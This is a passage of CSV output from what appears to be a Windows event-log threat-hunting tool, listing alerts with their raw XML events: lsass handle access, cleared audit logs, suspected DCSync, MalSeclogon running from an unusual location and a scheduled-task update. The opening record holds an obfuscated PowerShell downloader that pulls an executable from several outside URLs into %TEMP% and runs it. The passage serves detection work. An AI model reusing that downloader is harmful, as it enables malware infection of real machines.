((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;), DetailSequence=1
DetailTotal=1
SequenceNumber=21
UserId=DESKTOP-RIPCLIP\Clippy
HostName=ConsoleHost
HostVersion=5.1.19041.1
HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.1
RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
PipelineId=6
ScriptName=
CommandLine=$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(New-Item): &quot;New-Item&quot;
ParameterBinding(New-Item): name=&quot;ItemType&quot;; value=&quot;DIrectOry&quot;
ParameterBinding(New-Item): name=&quot;Path&quot;; value=&quot;C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\&quot;
</Data>
<Binary></Binary>
</EventData>
</Event>",DESKTOP-RIPCLIP,Windows PowerShell
non-system accounts getting a handle to and accessing lsass,1583705494.340693,2020-03-09T02:11:34.340693+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4663,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4663</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12802</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
</TimeCreated>
<EventRecordID>314462</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""160"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
<Data Name=""SubjectUserName"">IEUser</Data>
<Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
<Data Name=""SubjectLogonId"">0x33392</Data>
<Data Name=""ObjectServer"">Security</Data>
<Data Name=""ObjectType"">Process</Data>
<Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
<Data Name=""HandleId"">0x558</Data>
<Data Name=""AccessList"">%%4484
</Data>
<Data Name=""AccessMask"">0x10</Data>
<Data Name=""ProcessId"">0x1688</Data>
<Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""ResourceAttributes"">-</Data>
</EventData>
</Event>",MSEDGEWIN10,Security
non-system accounts getting a handle to and accessing lsass,1583705494.340584,2020-03-09T02:11:34.340584+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4656,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4656</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12802</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-08T22:11:34.340479Z"">
</TimeCreated>
<EventRecordID>314461</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""160"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
<Data Name=""SubjectUserName"">IEUser</Data>
<Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
<Data Name=""SubjectLogonId"">0x33392</Data>
<Data Name=""ObjectServer"">Security</Data>
<Data Name=""ObjectType"">Process</Data>
<Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
<Data Name=""HandleId"">0x558</Data>
<Data Name=""TransactionId"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""AccessList"">%%1537
%%1538
%%1539
%%1540
%%1541
%%4480
%%4481
%%4482
%%4483
%%4484
%%4485
%%4486
%%4487
%%4488
%%4489
%%4490
%%4491
%%4492
%%4493
</Data>
<Data Name=""AccessReason"">-</Data>
<Data Name=""AccessMask"">0x1f3fff</Data>
<Data Name=""PrivilegeList"">-</Data>
<Data Name=""RestrictedSidCount"">0</Data>
<Data Name=""ProcessId"">0x1688</Data>
<Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""ResourceAttributes"">-</Data>
</EventData>
</Event>",MSEDGEWIN10,Security
Audit log cleared,1556393475.355063,2019-04-27T23:31:15.355063+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-27T19:27:55.274060Z"">
</TimeCreated>
<EventRecordID>4987</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""824"" ThreadID=""6060"">
</Execution>
<Channel>Security</Channel>
<Computer>IEWIN7</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-3583694148-1414552638-2922671848-1000</SubjectUserSid>
<SubjectUserName>IEUser</SubjectUserName>
<SubjectDomainName>IEWIN7</SubjectDomainName>
<SubjectLogonId>0xffa8</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",IEWIN7,Security
Audit log cleared,1600198172.174941,2020-09-15T23:29:32.174941+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-15T19:28:17.594374Z"">
</TimeCreated>
<EventRecordID>768617</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""264"" ThreadID=""796"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
<SubjectUserName>a-jbrown</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x4c331</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",01566s-win16-ir.threebeesco.com,Security
Dcsync Attack detected,1557281451.611176,2019-05-08T06:10:51.611176+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4662</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-08T02:10:43.487217Z"">
</TimeCreated>
<EventRecordID>202793</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""4632"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-500</Data>
<Data Name=""SubjectUserName"">Administrator</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40c6511</Data>
<Data Name=""ObjectServer"">DS</Data>
<Data Name=""ObjectType"">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
<Data Name=""ObjectName"">%{c6faf700-bfe4-452a-a766-424f84c29583}</Data>
<Data Name=""OperationType"">Object Access</Data>
<Data Name=""HandleId"">0x0</Data>
<Data Name=""AccessList"">%%7688
</Data>
<Data Name=""AccessMask"">0x100</Data>
<Data Name=""Properties"">%%7688
{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}
</Data>
<Data Name=""AdditionalInfo"">-</Data>
<Data Name=""AdditionalInfo2""></Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1557281451.580169,2019-05-08T06:10:51.580169+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4662</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-08T02:10:43.487217Z"">
</TimeCreated>
<EventRecordID>202792</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""4632"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-500</Data>
<Data Name=""SubjectUserName"">Administrator</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40c6511</Data>
<Data Name=""ObjectServer"">DS</Data>
<Data Name=""ObjectType"">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
<Data Name=""ObjectName"">%{c6faf700-bfe4-452a-a766-424f84c29583}</Data>
<Data Name=""OperationType"">Object Access</Data>
<Data Name=""HandleId"">0x0</Data>
<Data Name=""AccessList"">%%7688
</Data>
<Data Name=""AccessMask"">0x100</Data>
<Data Name=""Properties"">%%7688
{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}
</Data>
<Data Name=""AdditionalInfo"">-</Data>
<Data Name=""AdditionalInfo2""></Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1600340264.254575,2020-09-17T14:57:44.254575+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-17T10:57:37.013214Z"">
</TimeCreated>
<EventRecordID>769792</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""264"" ThreadID=""7672"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
<SubjectUserName>a-jbrown</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x4c331</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",01566s-win16-ir.threebeesco.com,Security
Dcsync Attack detected,1557281443.487217,2019-05-08T06:10:43.487217+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4662</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-08T02:10:43.487217Z"">
</TimeCreated>
<EventRecordID>202791</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""4632"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-500</Data>
<Data Name=""SubjectUserName"">Administrator</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40c6511</Data>
<Data Name=""ObjectServer"">DS</Data>
<Data Name=""ObjectType"">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
<Data Name=""ObjectName"">%{c6faf700-bfe4-452a-a766-424f84c29583}</Data>
<Data Name=""OperationType"">Object Access</Data>
<Data Name=""HandleId"">0x0</Data>
<Data Name=""AccessList"">%%7688
</Data>
<Data Name=""AccessMask"">0x100</Data>
<Data Name=""Properties"">%%7688
{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}
</Data>
<Data Name=""AdditionalInfo"">-</Data>
<Data Name=""AdditionalInfo2""></Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1595449776.414827,2020-07-23T00:29:36.414827+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-22T20:29:27.321769Z"">
</TimeCreated>
<EventRecordID>887106</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""8"" ThreadID=""6640"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
<SubjectUserName>a-jbrown</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x3a17a</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",01566s-win16-ir.threebeesco.com,Security
Process running in Unusual location,1638898381.636384,2021-12-07T21:33:01.636384+04:00,,Threat,High,"User Name : ( MSEDGEWIN10$ ) with process : ( \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4688</EventID>
<Version>2</Version>
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
</TimeCreated>
<EventRecordID>329919</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""7648"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-18</Data>
<Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
<Data Name=""SubjectDomainName"">WORKGROUP</Data>
<Data Name=""SubjectLogonId"">0x3e7</Data>
<Data Name=""NewProcessId"">0x17b8</Data>
<Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
<Data Name=""TokenElevationType"">%%1936</Data>
<Data Name=""ProcessId"">0x27c</Data>
<Data Name=""CommandLine""></Data>
<Data Name=""TargetUserSid"">S-1-0-0</Data>
<Data Name=""TargetUserName"">IEUser</Data>
<Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
<Data Name=""TargetLogonId"">0x16e3db3</Data>
<Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
<Data Name=""MandatoryLabel"">S-1-16-12288</Data>
</EventData>
</Event>",MSEDGEWIN10,Security
schedule task updated,1553518420.276615,2019-03-25T16:53:40.276615+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4702</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T12:52:45.500611Z"">
</TimeCreated>
<EventRecordID>198239223</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3616"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-20</Data>
<Data Name=""SubjectUserName"">DC1$</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x3e4</Data>
<Data Name=""TaskName"">\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</Data>
<Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;RegistrationInfo&gt;
&lt;Source&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Source&gt;
&lt;Author&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Author&gt;
&lt;Version&gt;1.0&lt;/Version&gt;
&lt;Description&gt;$(@%systemroot%\system32\sppc.dll,-201)&lt;/Description&gt;
&lt;URI&gt;\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask&lt;/URI&gt;
&lt;SecurityDescriptor&gt;D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)&lt;/SecurityDescriptor&gt;
&lt;/RegistrationInfo&gt;
&lt;Triggers&gt;
&lt;CalendarTrigger&gt;
&lt;StartBoundary&gt;2019-03-26T12:51:45Z&lt;/StartBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;ScheduleByDay&gt;
&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;
&lt;/ScheduleByDay&gt;
&lt;/CalendarTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;NetworkService&quot;&gt;
&lt;UserId&gt;S-1-5-20&lt;/UserId&gt;
&lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt;
&lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt;
&lt;UseUnifiedSchedulingEngine&gt;true&lt;/UseUnifiedSchedulingEngine&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;RestartOnFailure&gt;
&lt;Interval&gt;PT1M&lt;/Interval&gt;
&lt;Count&gt;3&lt;/Count&gt;
&lt;/RestartOnFailure&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;NetworkService&quot;&gt;
&lt;ComHandler&gt;
&lt;ClassId&gt;{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}&lt;/ClassId&gt;
&lt;Data&gt;&lt;![CDATA[timer]]&gt;&lt;/Data&gt;
&lt;/ComHandler&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1645007839.637236,2022-02-16T14:37:19.637236+04:00,,Audit,Critical,Audit log cleared by user ( jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2022-02-16T10:37:07.251285Z"">
</TimeCreated>
<EventRecordID>2988521</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""604"" ThreadID=""3848"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1105</SubjectUserSid>
<SubjectUserName>jbrown</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x1717b6</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",01566s-win16-ir.threebeesco.com,Security
User Created through management interface,1600248733.647851,2020-09-16T13:32:13.647851+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
